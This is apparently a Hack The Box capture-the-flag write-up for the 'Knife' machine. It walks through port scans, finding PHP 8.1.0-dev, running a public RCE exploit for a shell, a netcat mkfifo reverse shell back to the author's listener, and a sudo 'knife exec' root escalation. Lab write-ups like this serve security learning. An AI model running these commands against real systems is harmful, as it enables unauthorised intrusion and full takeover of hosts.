HTB: Knife

3 minute read

Summary

Knife was a very simple machine that first involved seeing the HTTP user agent to a web server and seeing that it was using a version of PHP that was vulnerable to remote code execution. Then the priv esc to root was as simple as seeing that knife binary could be run with sudo without a password which had an entry in gtfobins so was able to execute a root shell using this knife binary. So without further or do lets jump into knife from hackthebox.

Recon

$cat nmap/initial.txt 
# Nmap 7.91 scan initiated Sun May 23 13:33:30 2021 as: nmap -A -oN nmap/initial.txt -vvv 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up, received syn-ack (0.032s latency).
Scanned at 2021-05-23 13:33:31 BST for 10s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjEtN3+WZzlvu54zya9Q+D0d/jwjZT2jYFKwHe0icY7plEWSAqbP+b3ijRL6kv522KEJPHkfXuRwzt5z4CNpyUnqr6nQINn8DU0Iu/UQby+6OiQIleNUCYYaI+1mV0sm4kgmue4oVI1Q3JYOH41efTbGDFHiGSTY1lH3HcAvOFh75dCID0564T078p7ZEIoKRt1l7Yz+GeMZ870Nw13ao0QLPmq2HnpQS34K45zU0lmxIHqiK/IpFJOLfugiQF52Qt6+gX3FOjPgxk8rk81DEwicTrlir2gJiizAOchNPZjbDCnG2UqTapOm292Xg0hCE6H03Ri6GtYs5xVFw/KfGSGb7OJT1jhitbpUxRbyvP+pFy4/8u6Ty91s98bXrCyaEy2lyZh5hm7MN2yRsX+UbrSo98UfMbHkKnePg7/oBhGOOrUb77/DPePGeBF5AT029Xbz90v2iEFfPdcWj8SP/p2Fsn/qdutNQ7cRnNvBVXbNm0CpiNfoHBCBDJ1LR8p8k=
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
|   256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 23 13:33:41 2021 -- 1 IP address (1 host up) scanned in 10.80 seconds

And then an all port scan

$cat nmap/all-ports 
# Nmap 7.91 scan initiated Sun May 23 13:38:45 2021 as: nmap -p- -oN nmap/all-ports --min-rate 10000 -vvv 10.10.10.242
Increasing send delay for 10.10.10.242 from 0 to 5 due to 458 out of 1525 dropped probes since last increase.
Warning: 10.10.10.242 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.242 from 640 to 1000 due to 308 out of 1025 dropped probes since last increase.
Nmap scan report for knife.htb (10.10.10.242)
Host is up, received syn-ack (0.029s latency).
Scanned at 2021-05-23 13:38:45 BST for 15s
Not shown: 64779 closed ports, 754 filtered ports
Reason: 64779 conn-refused and 754 no-responses
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun May 23 13:39:00 2021 -- 1 IP address (1 host up) scanned in 15.15 seconds

Enumeration of Services

HTTP 80

Gobuster didn’t seem to find anything of use

$cat gobuster-main-php.txt 
/index.php            (Status: 200) [Size: 5815]
┌─[purplerabbit@kali]─[~/Documents/htb/knife]
└──╼ $cat gobuster-main-raft.txt 
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277]

Going over to the webserver a medical page where none of the links are working

So because there wasn’t anything in gobuster and there wasn’t anything on the website itself, I will throw the request into burp and see if there are any interesting HTTP headers.

From this I see that its running PHP 8.1.0 dev

Shell as James

Looking for any vulnerabilities related to this showed that there was a vulnerability

 $searchsploit php dev 8.1
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                 | php/webapps/49933.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Copying this scirpt and running it inputting the url of the webserver gives a shell as James on the machine

$python3 49933.py 
Enter the full host url:
http://10.10.10.242/index.php

Interactive shell is opened on http://10.10.10.242/index.php 
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)

$ whoami
james

I then used netcat to send a reverse shell over to my local machine so that I could get a fully interactive tty shell

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.91 4444 >/tmp/f

I then used python tty trick to get a fully interactive shell as James

$ python3 -c 'import pty;pty.spawn("/bin/bash");' 

─[purplerabbit@kali]─[~/Documents/htb/knife]                                                                                                                                                                                                        
nc -lvp 4444                                                                                                           
            ls                                                                                                         
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr                                          
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var                                                                                                                                                                 
james@knife:/$ cd home                                                                                                 

James => Root

Enumerating if James could run any commands as sudo showed that he could run the knife command as root

james@knife:/tmp$ sudo -l                                  
Matching Defaults entries for james on knife:              
    env_reset, mail_badpass,                                                                                           
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
                                                                                                                       
User james may run the following commands on knife:                                                                    
    (root) NOPASSWD: /usr/bin/knife

Looking online at gtfobins https://gtfobins.github.io/gtfobins/knife/#sudo showed that this was exploitable by running

sudo knife exec -E 'exec "/bin/sh"'

So running this command gave root on the machine

james@knife:/tmp$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

That was knife from hackthebox! Hope you enjoyed!